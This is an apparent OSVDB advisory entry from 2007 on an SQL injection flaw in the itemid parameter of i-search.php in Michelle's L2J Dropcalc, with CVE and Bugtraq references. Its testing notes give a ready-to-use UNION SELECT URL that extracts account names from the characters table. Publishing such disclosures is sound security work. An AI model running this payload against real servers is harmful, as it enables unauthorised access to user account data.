Michelle's L2J Dropcalc i-search.php itemid Variable SQL Injection

2007-01-31T00:00:00
ID OSVDB:36038
Type osvdb
Reporter Codebreak(codebreak1984@gmail.com)
Modified 2007-01-31T00:00:00

Description

Manual Testing Notes

http://[Target]/[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"

References:

ISS X-Force ID: 32003 Generic Exploit URL: http://milw0rm.com/exploits/3232 CVE-2007-0687 Bugtraq ID: 22335